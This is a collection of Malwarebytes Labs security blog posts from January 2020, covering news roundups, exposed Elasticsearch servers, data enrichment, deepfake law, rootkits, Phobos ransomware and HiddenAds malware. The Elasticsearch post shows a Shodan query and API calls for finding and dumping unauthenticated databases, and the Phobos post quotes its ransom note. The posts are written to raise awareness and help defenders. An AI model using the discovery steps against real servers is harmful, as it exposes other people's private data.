Techie Feeds

A week in security (January 13 – 19)

Malwarebytes - Mon, 01/20/2020 - 16:32

Last week on Malwarebytes Labs, we taught you how to prevent a rootkit attack, explained what data enrichment means, informed you about new rules on deepfakes in the US, and demonstrated how backdoors in elastic servers expose private data.

Other cybersecurity news
  • An online group of cybersecurity analysts calling themselves Intrusion Truth have revealed information about their fourth Chinese state-sponsored hacking operation. (Source: ZDNet)
  • Travelex warned customers of a phone scam threat in wake of their ransomware attack. (Source: Graham Cluley)
  • The federal government is preparing for another fight with Apple in an ongoing battle for access to encrypted iPhones. (Source: Vox recode)
  • Proof-of-concept exploit code has been published for critical flaws impacting the Cisco Data Center Network Manager (DCNM) tool for managing network platforms and switches. (Source: ThreatPost)
  • The Dutch National Cybersecurity Centre (NCSC) says that companies should consider turning off Citrix ADC and Gateway servers if the impact is acceptable. (Source: BleepingComputer)
  • Hackers stole personal information from 100,000 West Australians in a cyberattack on P&N Bank. (The West Australian)
  • In an important Patch Tuesday release, Microsoft fixed critical bugs in CryptoAPI, RD Gateway, and .NET. (Source: Naked Security)
  • The latest update to Google’s Smart Lock app on iOS means you can now use your iPhone as a physical 2FA security key for logging into Google’s first-party services in Chrome. (Source: The Verge)
  • The domain name has been seized by the FBI. The website sold information claiming to have more than 12 billion records gathered from over 10,000 breaches. (Source: DarkReading)
  • Pretending to be the Permanent Mission of Norway, Emotet operators performed a targeted phishing attack against users associated with the United Nations. (Source: BleepingComputer)

Stay safe, everyone!

The post A week in security (January 13 – 19) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Business in the front, party in the back: backdoors in elastic servers expose private data

Malwarebytes - Fri, 01/17/2020 - 18:58

It seems like every day we read another article about a data breach or leak of cloud storage exposing millions of users’ data.

The unfortunate truth is that the majority of these leaks require no actual “hacking” on the part of the attacker. Most of the time, this highly confidential data is just sitting in open databases, ripe for the picking.
It’s all too easy to discover data leaks online, especially in cloud services, which says a lot about the state of security and preparedness for cyberattacks—we have a long way to go.

Continuing my series on insecure cloud infrastructure, where I previously covered AWS and PACS, I will be going into some detail on elastic servers. Specifically, I will cover a number of cases in which I discovered a common misconfiguration, leading to open backdoors, which expose many records of personal data.

Exposed databases using search

Before I go into detail on the accidental backdoors found in elastic servers, let’s take a look at just how easy it is to find one of these exposed databases online.

While there are dozens of tools and methods for this discovery phase, for the purposes of this demonstration, I used shodan, a search engine that crawls the web for Internet-connected devices.

Let’s do a quick experiment and see if it yields results. With a quick Google search on elastic databases, we learn that elastic databases by default listen on port 9200.

From there, we open up shodan and search:
elastic port:9200

This will basically bring up IPs who have a service responding on port 9200 and whose content contains the word “elastic.” Ninety-nine percent of the time, this will bring up an elastic search server.

For the sake of full comprehension, I will give a 10-second primer on how to use the elastic search API.

Elastic can be compared to MYSQL in the following way:

MYSQL ELASTICDatabasesIndicesTablesTypesRecords – column and rowDocument with properties

Here are a few key commands to help you navigate any elastic instance. The first is the /_cat command and the second is the /_search?pretty=true.
The cat command simply lists information, and it is a good starting point to understand what indices or fields you have to work with.

Elastic servers

Jumping into shodan, we start our search for elastic databases.

Let’s choose the a random IP that comes up from the shodan query. In this case, it is a server residing in China:

We can check if it is open to the world by typing in:

This brings up the following results:

Seems like no authentication so far. Let’s look at what indices exist here by typing in /_cat/indices, which gives us the following results:

So far so good. It is clear that at the moment we will not likely be facing any authentication stopping us from accessing the data. Now we can list the contents of one of these indices, similar to a Select * from TABLE_NAME in sql. Lets choose one at random, kms_news, which looks to have 37 records inside.

We type
and voila! All the data spits out for us with hardly any effort at all.

As you can see, it was quite easy to find exposed data in a random elastic server online. In less than a minute, we found an exposed server and could continue to dump all the data. I am certain that if we spent a bit more time, we would find a database with a more critical leak.

There is a reason, after all, that these databases have received so much press for their infamous leaks.

The backdoor

Now lets get to the topic at hand… the misconfigurations leading to the backdoor.

Along with elastic, you often hear the word Kibana. This is basically the GUI front end to an elastic database, allowing you to browse/search data and configure the structure and details of the elastic instance.

As such, it is common for companies to have an internal elastic DB on premise and expose the Kibana front end so that employees may access the data from their web browser, fully authenticated. In this case, the Kibana server could listen on port 5601, open to the Internet, and will access the data from an internal elastic DB behind the company’s local intranet.

Proper configuration

So where does the backdoor lie? Well, after having done an exhaustive search of various Kibana servers online, I noticed something funny happening on a large number of results.

I would browse to the Kibana instance and receive the login screen as expected, but after doing a port scan using nmap on the same IP, I noticed a familiar port being opened:

The infamous 9200!

To be specific, I found more than 20 servers within a span of five minutes with this same misconfiguration. What’s going on here is that an admin set up elastic search and decided to allow access through the Kibana front end, restricted by proper authentication. The problem, however, is that the actual data store on port 9200 isn’t just communicating internally. It, too, is exposed to the Internet, allowing backdoor access to the data directly from elastic queries carried out by anyone who wants to look, just as we did in the example above.

Here is an illustration showing the misconfiguration, which should make it all the more clear.

Finding a port 9200 exposed to the public does not mean there will be something of value inside. However, the combination of these two ports being exposed and restricting access only on Kibana almost guarantees that there is data here the company wanted to keep private.

Elastic ready to snap

Elastic is likely the number one source of leaked data online, and after conducting this research, I would attribute that to how easy it is to misconfigure. The focus, of course, being on the relationship between the internal server on 9200 and the public-facing component on 5601.

The purpose of this article was not to talk about a specific company or to put anyone on blast for exposing public data. Rather, I am hoping to explain just how many servers are sitting on the Internet with this backdoor. There are thousands of elastic servers open to the public and exposing data—this is nothing new. What makes these specific cases unique is that there were clearly attempts to incorporate some type of security, however, the platform is clearly being misunderstood.

Because elastic search is such a commonly used cloud database, it’s important to highlight this specific misconfiguration because it can easily be fixed.

Finding the exposed data was neither the result of a 1337 hack, nor a difficult side channel to discover. Hopefully this may help admins using elastic to better understand the danger of defaults, and for security analysts, this hopefully provided some useful information on researching new cloud infrastructures.

Stay tuned for the next article in this series where I will be covering the details of various leaks found on elastic.

The post Business in the front, party in the back: backdoors in elastic servers expose private data appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Explained: data enrichment

Malwarebytes - Thu, 01/16/2020 - 18:27

How do your favorite brands know to use your first name in the subject line of their emails? Why do you seem to get discounts and special offers on products you’ve recently purchased? Businesses are able to personalize their marketing messages thanks to data enrichment.

Data enrichment applies to the process of enhancing, refining, and improving on raw data. It is usually the last step in constructing a dataset for a marketing campaign, but can be used for several other goals.

Contact enrichment is the most common form of data enrichment. Contact enrichment is the process of adding additional information to existing contacts for more complete data.

Consider, for example, the scenario where a database contains names and addresses, but is missing telephone numbers that sales teams will need to reach out to prospective customers. One option is to apply contact enrichment that can match the data that the existing database contains with the telephone numbers listed in another database.

Definition of data enrichment, extended

Data enrichment is defined as merging third-party data from an external authoritative source with an existing database of first-party customer data. Some organizations do this to enhance the data they already possess so they can make more informed decisions.

More broadly, data enrichment refers to processes used to enhance, refine, or otherwise improve on raw data. In this context, it encompasses the whole strategy and process needed to improve existing databases. This idea and other related concepts are essential in making data a valuable asset for almost any modern enterprise.

Data enrichment processes

Even though data enrichment can be accomplished in several different ways, many of the tools used to refine data in a dataset focus on correcting errors or filling in incomplete data. A common data enrichment process would, for example, correct likely misspellings or typographical errors in a database by using precision algorithms designed for that purpose. And some data enrichment tools could also add information to simple data tables.

Another way in which data enrichment can work is by extrapolating data. Through methodologies such as fuzzy logic, engineers can produce extra information from a given raw data set. This and other similar projects can also be described as data enrichment activities.

Data enrichment can also include the merger of data-tables into a new dataset by using corresponding fields. In layman’s terms: Companies can buy access to other databases and look for additional information about their customers, adding that information to their own database.

Privacy concerns

The merger or combination of data hardly ever happens after a subject has been asked for permission. This poses a privacy problem, as users typically have a reasonable idea about which information they have provided to a specific organization, but if organizations add information from other databases, this picture will be skewed. The organization will have information about them of which they are not aware.

As long as this is generally available information, the problem is minor. But consider the famous example of your insurance company getting hold of the data gathered on the client-card of your supermarket. Knowing what you buy and consume may be something you would rather keep from them.

There are some privacy regulations that limit data enrichment for this very reason. The General Data Protection Regulation (GDPR) is a regulation on data protection and privacy in the European Union (EU) and the European Economic Area (EEA). It also addresses the transfer of personal data outside the EU and EEA areas. GDPR allows customers to ask which information is present about them in an organizations’ database and have records or parts of the records deleted.

Since GDPR also regulates the exchange and transfer of personal data, this can severely limit an organization’s choice of data enrichment providers. In the GDPR terminology, any data provider you use is a “Data Processor.” In order to send any EU citizens’ data to any Data Provider for any purpose, including enrichment, you must have a Data Processing Agreement (DPA) signed with the vendor.

A DPA is a legally-binding contract that states the rights and obligations of each party concerning the protection of personal data. They are mandatory to establish a chain of responsibility for the use, and safety, of personal data.

Steps to successful data enrichment

There are a few things to be done before you embark on a successful data enrichment process:

  • Sanitize your own data, or you will end up paying for data you will never use. Getting extra information about non-existing people, or adding to incomplete records is a waste.
  • Determine your goals and purpose for the data enrichment exercise. Again, avoid paying for data that turns out to be useless. Don’t pay for data tables just because they are available. If you are not going to use them, skip them.
  • Determine which processes the enriched data will support. Will the projected return outweigh the cost?
  • Determine your target market in terms of account profiles and personas. Do you want the data for a subset of customers that meet certain criteria, or would you, for example, like to exclude residents of GDPR-enforcing countries?

Sanitizing not only means removing duplicates, but also checking the validity of older data and the usefulness of entries that were filled out by customers or prospects themselves—on your website, for example.

Once you have determined your goals and decided which data are crucial to achieve these goals, then start looking for a data provider. Some may be more expensive but stronger in a certain data field. You can maximize your success by finding the data provider that best fits your needs.

Not all data enrichment makes you rich

Keep in mind that buying—and storing—the extra data will cost you. Data needs to be backed up and protected, and the storage costs can amount to a pretty sum depending on the size of the datasets. And if the data is not kept up to date, then it may soon become worthless.

Finally, if you’re ever breached, the amount and type of leaked data are determining factors for the ensuing loss of reputation.

The post Explained: data enrichment appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Rules on deepfakes take hold in the US

Malwarebytes - Wed, 01/15/2020 - 16:59

For years, an annual, must-pass federal spending bill has served as a vehicle for minor or contentious provisions that might otherwise falter in standalone legislation, such as the prohibition of new service member uniforms, or the indefinite detainment of individuals without trial.

In 2019, that federal spending bill, called the National Defense Authorization Act (NDAA), once again included provisions separate from the predictable allocation of Department of Defense funds. This time, the NDAA included language on deepfakes, the machine-learning technology that, with some human effort, has created fraudulent videos of UK political opponents Boris Johnson and Jeremy Corbyn endorsing one another for Prime Minister.

Matthew F. Ferraro, a senior associate at the law firm WilmerHale who advises clients on national security, cyber security, and crisis management, called the deepfakes provisions a “first.”

“This is the first federal legislation on deepfakes in the history of the world,” Ferraro said about the NDAA, which was signed by the President into law on December 20, 2019.

But rather than creating new policies or crimes regarding deepfakes—like making it illegal to develop or distribute them—the NDAA asks for a better understanding of the burgeoning technology. It asks for reports and notifications to Congress.

Per the NDAA’s new rules, the US Director of National Intelligence must, within 180 days, submit a report to Congress that provides information on the potential national security threat that deepfakes pose, along with the capabilities of foreign governments to use deepfakes in US-targeted disinformation campaigns, and what countermeasures the US currently has or plans to develop.

Further, the Director of National Intelligence must notify Congress each time a foreign government either has, is currently, or plans to launch a disinformation campaign using deepfakes of “machine-generated text,” like that produced by online bots that impersonate humans.

Lee Tien, senior staff attorney for Electronic Frontier Foundation, said that, with any luck, the DNI report could help craft future, informed policy. Whether Congress will actually write any legislation based on the DNI report’s information, however, is a separate matter.

“You can lead a horse to water,” Tien said, “but you can’t necessarily make them drink.”

With the NDAA’s passage, Malwarebytes is starting a two-part blog on deepfake legislation in the United States. Next week we will explore several Congressional and stateside bills in further depth.

The National Defense Authorization Act

The National Defense Authorization Act of 2020 is a sprawling, 1,000-plus page bill that includes just two sections on deepfakes. The sections set up reports, notifications, and a deepfakes “prize” for research in the field.

According to the first section, the country’s Director of National Intelligence must submit an unclassified report to Congress within 180 days that covers the “potential national security impacts of machine manipulated media (commonly known as “deepfakes”); and the actual or potential use of machine-manipulated media by foreign governments to spread disinformation or engage in other malign activities.”

The report must include the following seven items:

  • An assessment of the technology capabilities of foreign governments concerning deepfakes and machine-generated text
  • An assessment of how foreign governments could use or are using deepfakes and machine-generated text to “harm the national security interested of the United States”
  • An updated identification of countermeasure technologies that are available, or could be made available, to the US
  • An updated identification of the offices inside the US government’s intelligence community that have, or should have, responsibility on deepfakes
  • A description of any research and development efforts carried out by the intelligence community
  • Recommendations about whether the intelligence community needs tools, including legal authorities and budget, to combat deepfakes and machine-generated text
  • Any additional info that the DNI finds appropriate

The report must be submitted in an unclassified format. However, an annex to the report that specifically addresses the technological capabilities of the People’s Republic of China and the Russian Federation may be classified.

The NDAA also requires that the DNI notify the Congressional intelligence committees each time there is “credible information” that an identifiable, foreign entity has used, will use, or is currently using deepfakes or machine-generated text to influence a US election or domestic political processes.

Finally, the NDAA also requires that the DNI set up what it calls a “deepfakes prize competition,” in which a program will be established “to award prizes competitively to stimulate the research, development, or commercialization of technologies to automatically detect machine-manipulated media.” The prize amount cannot exceed $5 million per year.

As the first, approved federal language on deepfakes, the NDAA is rather non-controversial, Tien said.

“Politically, there’s nothing particularly significant about the fact that this is the first thing that we’ve seen the government enact in any sort of way about [deepfakes and machine-generated text],” Tien said, emphasizing that the NDAA has been used as a vehicle for other report-making provisions for years. “It’s also not surprising that it’s just reports.”

But while the NDAA focuses only on research, other pieces of legislation—including some that have become laws in a couple of states—directly confront the assumed threat of deepfakes to both privacy and trust.

Pushing back against pornographic and political deception

Though today feared as a democracy destabilizer, deepfakes began not with political subterfuge or international espionage, but with porn.

In 2017, a Reddit user named “deepfakes” began posting short clips of nonconsensual pornography that mapped the digital likenesses of famous actresses and celebrities onto the bodies of pornographic performers. This proved wildly popular.

In little time, a dedicated “subreddit”—a smaller, devoted forum—was created, and increasingly more deepfake pornography was developed and posted online. Two offshoot subreddits were created, too—one for deepfake “requests,” and another for fulfilling those requests. (Ugh.)

While the majority of deepfake videos feature famous actresses and musicians, it is easy to imagine an abusive individual making and sharing a deepfake of an ex-partner to harm and embarrass them.  

In 2018, Reddit banned the deepfake subreddits, but the creation of deepfake material surged, and in the same year, a new potential threat emerged.

Working with producers at Buzzfeed, comedian and writer Jordan Peele helped showcase the potential danger of deepfake technology when he lent his voice to a manipulated video of President Barack Obama.

“We’re entering an era in which our enemies can make anyone say anything at any point in time, even if they would never say those things,” Peele said, posing as President Obama.

This year, that warning gained some legitimacy, when a video of Speaker of the House of Representatives Nancy Pelosi was slowed down to fool viewers into thinking that the California policymaker was either drunk or impaired. Though the video was not a deepfake because it did not rely on machine-learning technology, its impact was clear: It was viewed by more than 2 million people on Facebook and shared on Twitter by the US President’s personal lawyer, Rudy Giuliani.

These threats spurred lawmakers in several states to introduce legislation to prohibit anyone from developing or sharing deepfakes with the intent to harm or deceive.

On July 1, Virginia passed a law that makes the distribution of nonconsensual pornographic videos a Class 1 misdemeanor. On September 1, Texas passed a law to prohibit the making and sharing of deepfake videos with the intent to harm a political candidate running for office. In October, California Governor Gavin Newsom signed Assembly Bills 602 and 730, which, respectively, make it illegal to create and share nonconsensual deepfake pornography and to try to influence a political candidate’s run for office with a deepfake released within 60 days of an election.

Along the way, Congressional lawmakers in Washington, DC, have matched the efforts of their stateside counterparts, with one deepfake bill clearing the House of Representatives and another deepfake bill clearing the Senate.

The newfound interest from lawmakers is a good thing, Ferraro said.

“People talk a lot about how legislatures are slow, and how Congress is captured by interests, or its suffering ossification, but I look at what’s going on with manipulated media, and I’m filled with some sense of hope and satisfaction,” Ferraro said. “Both houses have reacted quickly, and I think that should be a moment of pride.”  

But the new legislative proposals are not universally approved. Upon the initial passage of California’s AB 730, the American Civil Liberties Union urged Gov. Newsom to veto the bill.

“Despite the author’s good intentions, this bill will not solve the problem of deceptive political videos; it will only result in voter confusion, malicious litigation, and repression of free speech,” said Kevin Baker, ACLU legislative director.

Another organization that opposes dramatic, quick regulation on deepfakes is EFF, which wrote earlier in the summer, that “Congress should not rush to regulate deepfakes.”

Why then, does EFF’s Tien welcome the NDAA?

Because, he said, the NDAA does not introduce substantial policy changes, but rather proposes a first step in creating informed policy in the future.

“From an EFF standpoint, we do want to encourage folks to actually synthesize the existing knowledge and to get to some sort of common ground on which people can then make policy choices,” Tien said. “We hope the [DNI report] will be mostly available to the public, because, if the DNI actually does what they say they’re going to do, we will learn more about what folks outside the US are doing [on deepfakes], and both inside the US, like efforts funded by the Department of Defense or by the intelligence community.”

Tien continued: “To me, that’s all good.”

Wait and see

The Director of National Intelligence has until June to submit their report on deepfakes and machine-generated text. But until then, more states, such as New York and Massachusetts, may forward deepfake bills that were already introduced last year.

Further, as deepfakes continue to be shared online, more companies may have to grapple with how to treat them. Just last week, Facebook announced a new political deepfake policy that many argue does little to stop the wide array of disinformation posted on the platform.

Join us next week, when we take a deeper look at current Federal and statewide deepfake legislation and at the tangential problem of fraudulent, low-tech videos now referred to as “cheapfakes.”

The post Rules on deepfakes take hold in the US appeared first on Malwarebytes Labs.

Categories: Techie Feeds

How to prevent a rootkit attack

Malwarebytes - Tue, 01/14/2020 - 17:31

If you’re ever at the receiving end of a rootkit attack, then you’ll understand why they are considered one of the most dangerous cyberthreats today.

Rootkits are a type of malware designed to stay undetected on your computer. Cybercriminals use rootkits to remotely access and control your machine, burrowing deep into the system like a latched-on tick. Rootkits typically infect computers via phishing email, fooling users with a legitimate-looking email that actually contains malware, but sometimes they can be delivered through exploit kits.

This article provides an overview of the different types of rootkits and explains how you can prevent them from infecting your computer.

What is a rootkit?

Originally, a rootkit was a collection of tools that enabled administrative access to a computer or network. Today, rootkits are associated with a malicious type of software that provides root-level, privileged access to a computer while hiding its existence and actions. Hackers use rootkits to conceal themselves until they decide to execute their malicious malware.

In addition, rootkits can deactivate anti-malware and antivirus software, and badly damage user-mode applications. Attackers can also use rootkits to spy on user behavior, launch DDoS attacks, escalate privileges, and steal sensitive data.

Possible outcomes of a rootkit attack

Today, malware authors can easily purchase rootkits on the dark web and use them in their attacks. The list below explores some of the possible consequences of a rootkit attack.

Sensitive data stolen

Rootkits enable hackers to install additional malicious software that steals sensitive information, like credit card numbers, social security numbers, and user passwords, without being detected.

Malware infection

Attackers use rootkits to install malware on computers and systems without being detected. Rootkits conceal the malicious software from any existing anti-malware or antivirus, often de-activating security software without user knowledge. As a result of deactivated anti-malware and antivirus software, rootkits enable attackers to execute harmful files on infected computers.

File removal

Rootkits grant access to all operating system files and commands. Attackers using rootkits can easily delete Linux or Windows directories, registry keys, and files.


Cybercriminals leverage rootkits to exploit unsecured networks and intercept personal user information and communications, such as emails and messages exchanged via chat.

Remote control 

Hackers use rootkits to remotely access and change system configurations. Then hackers can change the open TCP ports inside firewalls or change system startup scripts. 

Types of rootkit attacks

Attackers can install different rootkit types on any system. Below, you’ll find a review of the most common rootkit attacks.

Application rootkits

Application rootkits replace legitimate files with infected rootkit files on your computer. These rootkits infect standard programs like Microsoft Office, Notepad, or Paint. Attackers can get access to your computer every time you run those programs. Antivirus programs can easily detect them since they both operate on the application layer.

Kernel rootkits

Attackers use these rootkits to change the functionality of an operating system by inserting malicious code into it. This gives them the opportunity to easily steal personal information.

Bootloader rootkits

The bootloader mechanism is responsible for loading the operating system on a computer. These rootkits replace the original bootloader with an infected one. This means that bootloader rootkits are active even before the operating system is fully loaded.

Hardware and firmware rootkits

This kind of rootkit can get access to a computer’s BIOS system or hard drives as well as routers, memory chips, and network cards.

Virtualized rootkits

Virtualized rootkits take advantage of virtual machines in order to control operating systems. They were developed by security researchers in 2006 as a proof of concept.

These rootkits create a virtual machine before the operating system loads, and then simply take over control of your computer. Virtualized rootkits operate at a higher level than operating systems, which makes them almost undetectable.

How to prevent a rootkit attack

Rootkit attacks are dangerous and harmful, but they only infect your computer if you somehow launched the malicious software that carries the rootkit. The tips below outline the basic steps you should follow to prevent rootkit infection.

Scan your systems

Scanners are software programs aimed to analyze a system to get rid of active rootkits.

Rootkit scanners are usually effective in detecting and removing application rootkits. However, they are ineffective against kernel, bootloader, or firmware attacks. Kernel level scanners can only detect malicious code when the rootkit is inactive. This means that you have to stop all system processes and boot the computer in safe mode in order to effectively scan the system.

Security experts claim that a single scanner cannot guarantee the complete security of a system, due to these limitations. Therefore, many advise using multiple scanners and rootkit removers. To fully protect yourself against rootkits attacks at the boot or firmware level, you need to backup your data, then reinstall the entire system.

Avoid phishing attempts

Phishing is a type of social engineering attack in which hackers use email to deceive users into clicking on a malicious link or downloading an infected attachment.

The fraudulent email can be anything, from Nigerian prince scams asking to reclaim gold to fake messages from Facebook requesting that you update your login credentials. The infected attachments can be Excel or Word documents, a regular executable program, or an infected image.

Update your software

Many software programs contain vulnerabilities and bugs that allow cybercriminals to exploit them—especially older, legacy software. Usually, companies release regular updates to fix these bugs and vulnerabilities. But not all vulnerabilities are made public. And once software has reached a certain age, companies stop supporting them with updates.

Ongoing software updates are essential for staying safe and preventing hackers from infecting you with malware. Keep all programs and your operating system up-to-date, and you can avoid rootkit attacks that take advantage of vulnerabilities.

Use next-gen antivirus

Malware authors always try to stay one step ahead of the cybersecurity industry. To counter their progress, you should use antivirus programs that leverage modern security techniques, like machine learning-based anomaly detection and behavioral heuristics. This type of antivirus can determine the origin of the rootkit based on its behavior, detect the malware, and block it from infecting your system.

Monitor network traffic

Network traffic monitoring techniques analyze network packets in order to identify potentially malicious network traffic. Network analytics can also mitigate threats more quickly while isolating the network segments that are under attack to prevent the attack from spreading.

Rootkit prevention beats clean-up

A rootkit is one of the most difficult types of malware to find and remove. Attackers frequently use them to remotely control your computer, eavesdrop on your network communication, or execute botnet attacks

This is a nasty type of malware that can seriously affect your computer’s performance and lead to personal data theft. Since it’s difficult to detect a rootkit attack, prevention is often the best defense. Use the tips offered in this article as a starting point for your defense strategy. To ensure continual protection, continue learning. Attacks always change, and it’s important to keep up.

The post How to prevent a rootkit attack appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (January 6 – 12)

Malwarebytes - Mon, 01/13/2020 - 16:29

Last week on Malwarebytes Labs, we told readers how to check the safety of websites and their related files, explored the shady behavior taking place within the billion-dollar search industry, broke down the top six ways that hackers target retail businesses, and put a spotlight on the ransomware family Phobos.

We also broke a major new story when we discovered that a government-subsidized mobile phone is being shipped with pre-installed, unremovable malware.  

Other cybersecurity news

Stay safe, everyone!

The post A week in security (January 6 – 12) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Threat spotlight: Phobos ransomware lives up to its name

Malwarebytes - Fri, 01/10/2020 - 18:04

Ransomware has struck dead on organizations since it became a mainstream tool in cybercriminals’ belts years ago. From massive WannaCry outbreaks in 2017 to industry-focused attacks by Ryuk in 2019, ransomware’s got its hooks in global businesses and shows no signs of stopping. That includes a malware family known as Phobos ransomware, named after the Greek god of fear.

Phobos is another one of those ransomware families that primarily targets organizations by employing tried-and-tested tactics to infiltrate systems. Sometimes called Phobos NextGen and Phobos NotDharma, many consider this ransomware an off-shoot or variant—if not a rip-off—of the Dharma ransomware family, which is also called CrySis. This is attributed to Phobos’ operational and technical likeness to recent Dharma strains.

Phobos ransomware, like Sodinokibi, is sold in the underground in ransomware-as-a-service (RaaS) packages. This means that criminals with little to no technical know-how can create their own ransomware strain with the help of a kit, and organize a campaign against their desired targets.

However, Coveware researchers have noted that, compared to their peers, Phobos operators are “less organized and professional,” which has eventually led to extended ransom negotiations and more complications retrieving files and systems for Phobos ransomware victims during the decryption process.

Phobos ransomware infection vectors

Phobos can arrive on systems in several ways: via open or insecure remote desktop protocol (RDP) connections on port 3389, brute-forced RDP credentials, the use of stolen and bought RDP credentials, and old-fashion phishing. Phobos operators can also leverage malicious attachments, downloads, patch exploits, and software vulnerabilities to gain access to an organization’s endpoints and network.

Phobos ransomware primarily targets businesses; however, there have been several reports of consumers finding themselves face-to-face with this adversary, too.

Symptoms of Phobos ransomware infection

Systems affected by variants of the Phobos ransomware display the following symptoms:

Presence of ransom notes. Upon infection, Phobos drops two ransom notes in text (.TXT) and in executable web file (.HTA) format. The latter automatically opens after Phobos finishes encrypting files.

The HTA ransom note, which was noted to be a re-branded version of Dharma’s ransom note

Here’s a snippet of the note:

All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail [email address 1]

Write this ID in the title of your message [generated ID]

If there is no response from our mail, you can install the Jabber client and write to us in support of [email address 2]

You have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files.

As you can see, Phobos operators are requiring victims to contact them in the event of their ransomware infection.

In some notes from other variants, instructions to reach threat actors via Jabber are not included.

Aside from pertinent channels victims can reach the threat actors, this ransom note also contains information on how they can acquire Bitcoins and how to install the messenger client.

The TXT ransom note, which is notably shorter than its HTA counterpart. This means that non-tech savvy victims would have to resort to doing their own research to understand unfamiliar terms. Note that while this contains the email addresses also found in the HTA file, it doesn’t contain the generated ID.

!!! All of your files are encrypted !!!

To decrypt them send e-mail, to this address: [email address 1]

If there is no response from our mail, you can install the Jabber client and write to us in support of [email address 2]

After triggering the opening of the HTA ransom note, which supposedly signifies the end of Phobos’ encryption, we have observed that it is an aggressive ransomware that continues to run in the background and encode new files it is programmed to encrypt. It can do this with or without an Internet connection.

Encrypted files with a long, appended string after the extension name. Phobos encrypts target files using AES-256 with RSA-1024 asymmetric encryption. Both Phobos and Dharma implement the same RSA algorithm; however, Phobos uses it from Windows Crypto API while Dharma uses it from a third-party static library. Upon encryption, it appends a compound extension name at the end of encrypted files. This implements the format or formula:

.ID[ID][email address 1].[added extension]

In the formula, [ID] is the generated ID number specified in the ransom note. It is a two-part alpha-numeric string: the victim ID and the version ID, separated by a dash. [email address 1] is the email address victims are prescribed to use in reaching out to the threat actors. This is also specified in the ransom note. Lastly, [added extension] is an extension that Phobos threat actors decide to associate their ransomware with. Below are known extensions Phobos uses:

  • 1500dollars
  • actin
  • Acton
  • actor
  • Acuff
  • Acuna
  • acute
  • adage
  • Adair
  • Adame
  • banhu
  • banjo
  • Banks
  • Banta
  • Barak
  • bbc
  • blend
  • bqux
  • Caleb
  • Cales
  • Caley
  • calix
  • Calle
  • Calum
  • Calvo
  • com
  • DDoS
  • deal
  • deuce
  • Dever
  • devil
  • Devoe
  • Devon
  • Devos
  • dewar
  • eight
  • eject
  • eking
  • Elbie
  • elbow
  • elder
  • Frendi
  • help
  • karma
  • mamba
  • phobos
  • phoenix
  • PLUT
  • zax

For example, the new file name of sample.bmp after encryption is[23043C5D-2394].[].Caleb.

Phobos encrypts files with the following extensions:

However, it skips encoding the following OS files and files in the C:\Windows folder:

  • boot.ini
  • bootfont.bin
  • ntldr
  • io.sys

Phobos fully encodes files with sizes that can be classed as typical. For large files, however, it performs a different algorithm wherein it partially encrypts selected portions of such files. This is an effective method to severely cut down the time it takes to encrypt large files and, at the same time, maximize the damage it could do to such a file if something goes wrong with its decryption.

This ransomware attacks files in all local drives as well as network shares.

Terminated processes. Phobos ransomware is known to terminate the following active processes on affected systems so that no programs can stop it from accessing files to eventually encrypt:

Deleted shadow copies and local backups. Like Sodinokibi and other ransomware families, Phobos deletes shadow copies and backup copies of files to prevent users from restoring encrypted files, thus, forcing them to do the threat actors’ bidding.

Systems not booting in recovery mode. Recovery mode is innate in Windows systems. If users encounter a technical flaw leading to the system crashing or getting corrupted, they have the option to restore the OS to its normal state by reloading its last known state before the flaw. Phobos removes this option by preventing users from entering this mode.

Disabled firewall. As we already know, malware that firewalls stop could be allowed into the affected system.

Protect your system from Phobos ransomware

Malwarebytes’ signature-less detection, coupled with real-time anti-malware and anti-ransomware technology, identifies and protects consumer and business users from Phobos ransomware in various stages of attack.

We recommend both consumers and IT administrators take the following actions to secure and mitigate against Phobos ransomware attacks:

  • Set your RDP server, which is built in in the Windows OS, to deny public IPs access to TCP port 3389, the default port Windows Remote Desktop listens on. If you or your organizations have no need for RDP, better to disable the service altogether. Critical systems or systems with sensitive information should not have RDP enabled.
  • Along with RDP port blocking, we also suggest the blocking of TCP port 445, the default port a Server Message Block (SMB) uses to communicate in a Windows-based LAN at the network perimeter. Note that you or your organization may have to do in-depth testing to see how your system and/or programs are impacted by this block. As a rule of thumb, block all unused ports.
  • Allow RDP access to IPs that are under you or your organization’s control.
  • Enable the logging of RDP access attempts and review them regularly to detect instances of potential intrusion.
  • Enforce the use of strong passwords and account lockout policies for Active Directory domains and local Windows accounts.
  • Enforce multi-factor authentication (MFA) to RDP and local account logons whenever possible.
  • Enforce the use of a virtual private networks (VPNs) if your organization allows employees to work remotely.
  • Come up with and implement a sound backup strategy.
  • Maintain an inventory of running services and applications on your system, and review it regularly. For critical systems, it’s best to have an active monitoring and alerting scheme in place.
  • Have a disaster recovery scheme in place in case of a successful breach via RDP happens.
  • Keep all your software, including OS and anti-malware, up-to-date.

On a final note, if you have all your personal or organization resources properly locked down and secured, and you or your organization adhere to good cyber hygiene practices, there is little to be feared about Phobos or any ransomware in general.

Indicators of Compromise (IOCs)
  • e59ffeaf7acb0c326e452fa30bb71a36
  • eb5d46bf72a013bfc7c018169eb1739b
  • fa4c9359487bbda57e0df32a40f14bcd

Have a threat-free 2020, everyone!

The post Threat spotlight: Phobos ransomware lives up to its name appeared first on Malwarebytes Labs.

Categories: Techie Feeds

United States government-funded phones come pre-installed with unremovable malware

Malwarebytes - Thu, 01/09/2020 - 16:00

UPDATE: January 10, 2020

At time of original publication, we were not yet able to replicate the malware Android./Trojan.HiddenAds being dropped on our test device, though multiple users had reported that a variant of HiddenAds suddenly installed on their UMX mobile phone.

As of today, we are now able to report that our UMX U683CL test phone has become infected with a variant of HiddenAds we detect as Android/Trojan.HiddenAds.WRACT. This variant has been observed in the wild since spring 2019. It runs silently in the background and does not create an app icon. Evidence of its running in the background can be seen in the mobile device’s notifications. A notification box that changes its title name is highlighted below in red.

The app runs in the background without an icon, though a space remains where it would be.

The notification bar cannot be swiped out in notifications. It stubbornly remains running in the background.

Fortunately, there is a way to find and uninstall this app. If you press and hold the notification, it will give the option to go to MORE SETTINGS.

After clicking MORE SETTINGS, it will take you to the app’s notification settings. From there, press the app’s icon at the top.

Lastly, it will take you to the app’s App info, where you can uninstall.

Of course, Malwarebytes for Android takes care of this as well.


